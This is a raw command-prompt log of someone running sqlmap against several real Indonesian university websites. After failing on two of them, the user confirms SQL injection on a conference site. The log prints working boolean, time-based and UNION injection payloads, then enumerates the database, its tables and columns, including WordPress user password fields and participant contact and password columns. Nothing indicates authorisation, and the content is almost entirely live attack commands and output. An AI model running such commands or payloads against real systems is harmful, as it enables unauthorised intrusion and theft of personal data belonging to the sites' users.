Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>cd..
C:\Windows>cd..
C:\>python27/sqlmap/sqlmap.py -u http://www.aknsumenep.ac.id/pp.php?id=28 --batc
h --dbs
'python27' is not recognized as an internal or external command,
operable program or batch file.
C:\>Python27/sqlmap/sqlmap.py -u http://www.aknsumenep.ac.id/pp.php?id=28 --batc
h --dbs
'Python27' is not recognized as an internal or external command,
operable program or batch file.
C:\>Python27/sqlmap/sqlmap.py -u http://www.aknsumenep.ac.id/pp.php?id=28 --batc
h --dbs
'Python27' is not recognized as an internal or external command,
operable program or batch file.
C:\>Python27\sqlmap\sqlmap.py -u http://www.aknsumenep.ac.id/pp.php?id=28 --batc
h --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.0.12.14#dev}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 01:44:23
[01:44:23] [INFO] testing connection to the target URL
[01:44:24] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
[01:44:24] [INFO] testing if the target URL is stable
[01:44:24] [INFO] target URL is stable
[01:44:24] [INFO] testing if GET parameter 'id' is dynamic
[01:44:25] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:44:25] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[01:44:25] [INFO] testing for SQL injection on GET parameter 'id'
[01:44:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:44:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[01:44:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[01:44:26] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:44:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[01:44:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[01:44:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:44:26] [INFO] testing 'MySQL inline queries'
[01:44:26] [INFO] testing 'PostgreSQL inline queries'
[01:44:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:44:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[01:44:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[01:44:27] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c
omment)'
[01:44:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[01:44:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:44:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[01:44:28] [INFO] testing 'Oracle AND time-based blind'
[01:44:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:44:28] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[01:44:31] [WARNING] GET parameter 'id' does not seem to be injectable
[01:44:31] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. Also, you can try to r
erun by providing either a valid value for option '--string' (or '--regexp'). If
you suspect that there is some kind of protection mechanism involved (e.g. WAF)
maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[*] shutting down at 01:44:31

C:\>Python27\sqlmap\sqlmap.py -u https://pmb.usd.ac.id/index.php?id=30&mn=4 --ba
tch --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.0.12.14#dev}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 01:44:55
[01:44:55] [INFO] testing connection to the target URL
[01:44:56] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
[01:44:57] [INFO] testing if the target URL is stable
[01:44:57] [INFO] target URL is stable
[01:44:57] [INFO] testing if GET parameter 'id' is dynamic
[01:44:58] [INFO] confirming that GET parameter 'id' is dynamic
[01:44:58] [INFO] GET parameter 'id' is dynamic
[01:44:59] [ERROR] possible integer casting detected (e.g. "$id=intval($_REQUEST
['id'])") at the back-end web application
do you want to skip those kind of cases (and save scanning time)? [y/N] n
[01:45:05] [INFO] testing for SQL injection on GET parameter 'id'
[01:45:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:45:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[01:45:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[01:45:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:45:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[01:45:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[01:45:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:45:18] [INFO] testing 'MySQL inline queries'
[01:45:18] [INFO] testing 'PostgreSQL inline queries'
[01:45:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:45:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[01:45:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[01:45:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c
omment)'
[01:45:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[01:45:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:45:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[01:45:29] [INFO] testing 'Oracle AND time-based blind'
[01:45:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:45:31] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[01:45:59] [WARNING] GET parameter 'id' does not seem to be injectable
[01:45:59] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. Also, you can try to r
erun by providing either a valid value for option '--string' (or '--regexp'). If
you suspect that there is some kind of protection mechanism involved (e.g. WAF)
maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[*] shutting down at 01:45:59
'mn' is not recognized as an internal or external command,
operable program or batch file.
C:\>Python27\sqlmap\sqlmap.py -u https://pmb.usd.ac.id/index.php?id=30&mn=4 --ba
tch --dbms
___
__H__
___ ___["]_____ ___ ___ {1.0.12.14#dev}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 01:46:11
[01:46:11] [INFO] testing connection to the target URL
[01:46:12] [INFO] testing if the target URL is stable
[01:46:13] [INFO] target URL is stable
[01:46:13] [INFO] testing if GET parameter 'id' is dynamic
[01:46:13] [INFO] confirming that GET parameter 'id' is dynamic
[01:46:13] [INFO] GET parameter 'id' is dynamic
[01:46:14] [ERROR] possible integer casting detected (e.g. "$id=intval($_REQUEST
['id'])") at the back-end web application
do you want to skip those kind of cases (and save scanning time)? [y/N] n
[01:46:21] [INFO] testing for SQL injection on GET parameter 'id'
[01:46:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[01:46:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[01:46:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:46:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[01:46:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[01:46:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:46:35] [INFO] testing 'MySQL inline queries'
[01:46:36] [INFO] testing 'PostgreSQL inline queries'
[01:46:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:46:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[01:46:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[01:46:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c
omment)'
[01:46:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[01:46:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:46:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[01:46:49] [INFO] testing 'Oracle AND time-based blind'
[01:46:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:51] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[01:47:15] [WARNING] GET parameter 'id' does not seem to be injectable
[01:47:15] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. Also, you can try to r
erun by providing either a valid value for option '--string' (or '--regexp'). If
you suspect that there is some kind of protection mechanism involved (e.g. WAF)
maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[*] shutting down at 01:47:15
'mn' is not recognized as an internal or external command,
operable program or batch file.
C:\>Python27\sqlmap\sqlmap.py -u https://pmb.usd.ac.id/index.php?id=30 --batch -
-dbms
___
__H__
___ ___[.]_____ ___ ___ {1.0.12.14#dev}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
Usage: sqlmap.py [options]
sqlmap.py: error: --dbms option requires an argument
Press Enter to continue...
C:\>Python27\sqlmap\sqlmap.py -u https://pmb.usd.ac.id/index.php?id=30 --batch -
-dbs
___
__H__
___ ___[,]_____ ___ ___ {1.0.12.14#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 01:47:32
[01:47:33] [INFO] testing connection to the target URL
[01:47:33] [INFO] testing if the target URL is stable
[01:47:34] [INFO] target URL is stable
[01:47:34] [INFO] testing if GET parameter 'id' is dynamic
[01:47:34] [INFO] confirming that GET parameter 'id' is dynamic
[01:47:34] [INFO] GET parameter 'id' is dynamic
[01:47:35] [ERROR] possible integer casting detected (e.g. "$id=intval($_REQUEST
['id'])") at the back-end web application
do you want to skip those kind of cases (and save scanning time)? [y/N] N
[01:47:36] [INFO] testing for SQL injection on GET parameter 'id'
[01:47:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:47:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[01:47:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[01:47:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:47:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[01:47:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[01:47:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:47:47] [INFO] testing 'MySQL inline queries'
[01:47:48] [INFO] testing 'PostgreSQL inline queries'
[01:47:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:47:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[01:47:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[01:47:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c
omment)'
[01:47:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[01:47:54] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:47:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[01:48:00] [INFO] testing 'Oracle AND time-based blind'
[01:48:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:48:02] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[01:48:24] [WARNING] GET parameter 'id' does not seem to be injectable
[01:48:24] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. Also, you can try to r
erun by providing either a valid value for option '--string' (or '--regexp'). If
you suspect that there is some kind of protection mechanism involved (e.g. WAF)
maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[*] shutting down at 01:48:24

C:\>Python27\sqlmap\sqlmap.py -u http://elite.event.uinjkt.ac.id/acs/pages/abstr
act.php?id=78 --batch --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.0.12.14#dev}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:42:03
[09:42:04] [INFO] testing connection to the target URL
[09:42:05] [INFO] heuristics detected web page charset 'ISO-8859-2'
[09:42:05] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
[09:42:05] [INFO] testing if the target URL is stable
[09:42:05] [INFO] target URL is stable
[09:42:05] [INFO] testing if GET parameter 'id' is dynamic
[09:42:06] [INFO] confirming that GET parameter 'id' is dynamic
[09:42:06] [INFO] GET parameter 'id' is dynamic
[09:42:06] [INFO] heuristics detected web page charset 'ascii'
[09:42:06] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[09:42:06] [INFO] testing for SQL injection on GET parameter 'id'
[09:42:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:42:08] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WH
ERE or HAVING clause' injectable (with --string="OF")
[09:42:10] [INFO] heuristic (extended) test shows that the back-end DBMS could b
e 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp
ecific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (1) and risk (1) values? [Y/n] Y
[09:42:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[09:42:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B
IGINT UNSIGNED)'
[09:42:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXP)'
[09:42:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (E
XP)'
[09:42:10] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER
BY or GROUP BY clause (JSON_KEYS)'
[09:42:11] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause
(JSON_KEYS)'
[09:42:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[09:42:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (FLOOR)'
[09:42:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[09:42:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[09:42:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[09:42:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[09:42:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[09:42:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (F
LOOR)'
[09:42:12] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)
'
[09:42:12] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[09:42:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[09:42:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:42:12] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_
KEYS)'
[09:42:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:42:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[09:42:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[09:42:12] [INFO] testing 'MySQL inline queries'
[09:42:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[09:42:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:42:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment
)'
[09:42:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[09:42:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment
)'
[09:42:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:42:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[09:42:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-bas
ed blind' injectable
[09:42:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:42:23] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[09:42:24] [INFO] 'ORDER BY' technique appears to be usable. This should reduce
the time needed to find the right number of query columns. Automatically extendi
ng the range for current UNION query injection technique test
[09:42:25] [INFO] target URL appears to have 18 columns in query
[09:42:30] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 co
lumns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) re
quests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=78' AND 1350=1350 AND 'nfbT'='nfbT
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=78' AND SLEEP(5) AND 'FSHp'='FSHp
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: id=-4733' UNION ALL SELECT CONCAT(0x7178767671,0x474470787245636c45
51664c765a556476556f6568617062506f66676d674751726e574a53507155,0x71716b6b71),NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L-- tIAT
---
[09:42:31] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[09:42:31] [INFO] fetching database names
[09:42:31] [INFO] the SQL query used returns 2 entries
[09:42:32] [INFO] retrieved: information_schema
[09:42:32] [INFO] retrieved: elite
available databases [2]:
[*] elite
[*] information_schema
[09:42:32] [INFO] fetched data logged to text files under 'C:\Users\SRS\.sqlmap\
output\elite.event.uinjkt.ac.id'
[*] shutting down at 09:42:32

C:\>Python27\sqlmap\sqlmap.py -u http://elite.event.uinjkt.ac.id/acs/pages/abstr
act.php?id=78 -D elite --batch --columns
___
__H__
___ ___[(]_____ ___ ___ {1.0.12.14#dev}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:43:06
[09:43:07] [INFO] resuming back-end DBMS 'mysql'
[09:43:07] [INFO] testing connection to the target URL
[09:43:07] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=78' AND 1350=1350 AND 'nfbT'='nfbT
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=78' AND SLEEP(5) AND 'FSHp'='FSHp
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: id=-4733' UNION ALL SELECT CONCAT(0x7178767671,0x474470787245636c45
51664c765a556476556f6568617062506f66676d674751726e574a53507155,0x71716b6b71),NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L-- tIAT
---
[09:43:07] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[09:43:07] [INFO] fetching tables for database: 'elite'
[09:43:08] [INFO] the SQL query used returns 20 entries
[09:43:08] [INFO] retrieved: tbl_abstract
[09:43:09] [INFO] retrieved: tbl_files
[09:43:09] [INFO] retrieved: tbl_paper_reviewer
[09:43:10] [INFO] retrieved: tbl_participants
[09:43:10] [INFO] retrieved: tbl_reviewer
[09:43:11] [INFO] retrieved: tbl_system
[09:43:12] [INFO] retrieved: tbl_topic
[09:43:12] [INFO] retrieved: tbl_visitors
[09:43:12] [INFO] retrieved: wp_commentmeta
[09:43:13] [INFO] retrieved: wp_comments
[09:43:14] [INFO] retrieved: wp_links
[09:43:14] [INFO] retrieved: wp_options
[09:43:14] [INFO] retrieved: wp_postmeta
[09:43:15] [INFO] retrieved: wp_posts
[09:43:16] [INFO] retrieved: wp_term_relationships
[09:43:16] [INFO] retrieved: wp_term_taxonomy
[09:43:17] [INFO] retrieved: wp_termmeta
[09:43:17] [INFO] retrieved: wp_terms
[09:43:18] [INFO] retrieved: wp_usermeta
[09:43:18] [INFO] retrieved: wp_users
[09:43:18] [INFO] fetching columns for table 'tbl_abstract' in database 'elite'
[09:43:19] [INFO] the SQL query used returns 18 entries
[09:43:19] [INFO] retrieved: "id","int(10)"
[09:43:20] [INFO] retrieved: "uid","varchar(255)"
[09:43:20] [INFO] retrieved: "date","varchar(255)"
[09:43:21] [INFO] retrieved: "time","varchar(255)"
[09:43:21] [INFO] retrieved: "ip","varchar(255)"
[09:43:22] [INFO] retrieved: "hostname","varchar(255)"
[09:43:22] [INFO] retrieved: "uid_owner","varchar(255)"
[09:43:23] [INFO] retrieved: "title","text"
[09:43:23] [INFO] retrieved: "authors","text"
[09:43:24] [INFO] retrieved: "institutions","text"
[09:43:24] [INFO] retrieved: "content","text"
[09:43:25] [INFO] retrieved: "keywords","varchar(255)"
[09:43:25] [INFO] retrieved: "topic","varchar(255)"
[09:43:26] [INFO] retrieved: "last_update","varchar(255)"
[09:43:26] [INFO] retrieved: "accepted","varchar(1)"
[09:43:27] [INFO] retrieved: "payment","varchar(255)"
[09:43:27] [INFO] retrieved: "code1","varchar(255)"
[09:43:28] [INFO] retrieved: "presenter","varchar(255)"
[09:43:28] [INFO] fetching columns for table 'wp_links' in database 'elite'
[09:43:28] [INFO] the SQL query used returns 13 entries
[09:43:29] [INFO] retrieved: "link_id","bigint(20) unsigned"
[09:43:29] [INFO] retrieved: "link_url","varchar(255)"
[09:43:30] [INFO] retrieved: "link_name","varchar(255)"
[09:43:30] [INFO] retrieved: "link_image","varchar(255)"
[09:43:31] [INFO] retrieved: "link_target","varchar(25)"
[09:43:31] [INFO] retrieved: "link_description","varchar(255)"
[09:43:32] [INFO] retrieved: "link_visible","varchar(20)"
[09:43:32] [INFO] retrieved: "link_owner","bigint(20) unsigned"
[09:43:33] [INFO] retrieved: "link_rating","int(11)"
[09:43:33] [INFO] retrieved: "link_updated","datetime"
[09:43:34] [INFO] retrieved: "link_rel","varchar(255)"
[09:43:34] [INFO] retrieved: "link_notes","mediumtext"
[09:43:35] [INFO] retrieved: "link_rss","varchar(255)"
[09:43:35] [INFO] fetching columns for table 'wp_term_taxonomy' in database 'eli
te'
[09:43:35] [INFO] the SQL query used returns 6 entries
[09:43:36] [INFO] retrieved: "term_taxonomy_id","bigint(20) unsigned"
[09:43:36] [INFO] retrieved: "term_id","bigint(20) unsigned"
[09:43:37] [INFO] retrieved: "taxonomy","varchar(32)"
[09:43:37] [INFO] retrieved: "description","longtext"
[09:43:38] [INFO] retrieved: "parent","bigint(20) unsigned"
[09:43:38] [INFO] retrieved: "count","bigint(20)"
[09:43:39] [INFO] fetching columns for table 'wp_postmeta' in database 'elite'
[09:43:39] [INFO] the SQL query used returns 4 entries
[09:43:40] [INFO] retrieved: "meta_id","bigint(20) unsigned"
[09:43:40] [INFO] retrieved: "post_id","bigint(20) unsigned"
[09:43:41] [INFO] retrieved: "meta_key","varchar(255)"
[09:43:41] [INFO] retrieved: "meta_value","longtext"
[09:43:41] [INFO] fetching columns for table 'tbl_paper_reviewer' in database 'e
lite'
[09:43:41] [INFO] the SQL query used returns 6 entries
[09:43:42] [INFO] retrieved: "id","int(255)"
[09:43:42] [INFO] retrieved: "uid","varchar(255)"
[09:43:43] [INFO] retrieved: "paper_uid","varchar(255)"
[09:43:43] [INFO] retrieved: "reviewer_uid","varchar(255)"
[09:43:44] [INFO] retrieved: "review","text"
[09:43:44] [INFO] retrieved: "reviewer_name","varchar(255)"
[09:43:44] [INFO] fetching columns for table 'wp_users' in database 'elite'
[09:43:45] [INFO] the SQL query used returns 10 entries
[09:43:45] [INFO] retrieved: "ID","bigint(20) unsigned"
[09:43:46] [INFO] retrieved: "user_login","varchar(60)"
[09:43:46] [INFO] retrieved: "user_pass","varchar(255)"
[09:43:47] [INFO] retrieved: "user_nicename","varchar(50)"
[09:43:47] [INFO] retrieved: "user_email","varchar(100)"
[09:43:48] [INFO] retrieved: "user_url","varchar(100)"
[09:43:48] [INFO] retrieved: "user_registered","datetime"
[09:43:49] [INFO] retrieved: "user_activation_key","varchar(255)"
[09:43:49] [INFO] retrieved: "user_status","int(11)"
[09:43:50] [INFO] retrieved: "display_name","varchar(250)"
[09:43:50] [INFO] fetching columns for table 'wp_terms' in database 'elite'
[09:43:50] [INFO] the SQL query used returns 4 entries
[09:43:50] [INFO] retrieved: "term_id","bigint(20) unsigned"
[09:43:51] [INFO] retrieved: "name","varchar(200)"
[09:43:51] [INFO] retrieved: "slug","varchar(200)"
[09:43:52] [INFO] retrieved: "term_group","bigint(10)"
[09:43:52] [INFO] fetching columns for table 'wp_usermeta' in database 'elite'
[09:43:52] [INFO] the SQL query used returns 4 entries
[09:43:52] [INFO] retrieved: "umeta_id","bigint(20) unsigned"
[09:43:53] [INFO] retrieved: "user_id","bigint(20) unsigned"
[09:43:53] [INFO] retrieved: "meta_key","varchar(255)"
[09:43:53] [INFO] retrieved: "meta_value","longtext"
[09:43:53] [INFO] fetching columns for table 'tbl_participants' in database 'eli
te'
[09:43:54] [INFO] the SQL query used returns 26 entries
[09:43:54] [INFO] retrieved: "id","int(255)"
[09:43:54] [INFO] retrieved: "uid","varchar(255)"
[09:43:54] [INFO] retrieved: "userid","varchar(255)"
[09:43:55] [INFO] retrieved: "password2","varchar(255)"
[09:43:55] [INFO] retrieved: "date","varchar(255)"
[09:43:55] [INFO] retrieved: "time","varchar(255)"
[09:43:55] [INFO] retrieved: "ip","varchar(255)"
[09:43:55] [INFO] retrieved: "hostname","varchar(255)"
[09:43:56] [INFO] retrieved: "name1","varchar(255)"
[09:43:56] [INFO] retrieved: "name2","varchar(255)"
[09:43:57] [INFO] retrieved: "name3","varchar(255)"
[09:43:57] [INFO] retrieved: "title","varchar(255)"
[09:43:58] [INFO] retrieved: "institution","text"
[09:43:58] [INFO] retrieved: "street","varchar(255)"
[09:43:59] [INFO] retrieved: "city","varchar(255)"
[09:43:59] [INFO] retrieved: "zipcode","varchar(255)"
[09:44:00] [INFO] retrieved: "country","varchar(255)"
[09:44:00] [INFO] retrieved: "phone","varchar(255)"
[09:44:01] [INFO] retrieved: "fax","varchar(255)"
[09:44:01] [INFO] retrieved: "email","varchar(255)"
[09:44:02] [INFO] retrieved: "registered","varchar(255)"
[09:44:02] [INFO] retrieved: "fee","varchar(255)"
[09:44:03] [INFO] retrieved: "info","text"
[09:44:03] [INFO] retrieved: "from_internal","varchar(255)"
[09:44:04] [INFO] retrieved: "is_presenter","varchar(255)"
[09:44:04] [INFO] retrieved: "procbook","varchar(255)"
[09:44:04] [INFO] fetching columns for table 'wp_options' in database 'elite'
[09:44:05] [INFO] the SQL query used returns 4 entries
[09:44:05] [INFO] retrieved: "option_id","bigint(20) unsigned"
[09:44:06] [INFO] retrieved: "option_name","varchar(191)"
[09:44:06] [INFO] retrieved: "option_value","longtext"
[09:44:07] [INFO] retrieved: "autoload","varchar(20)"
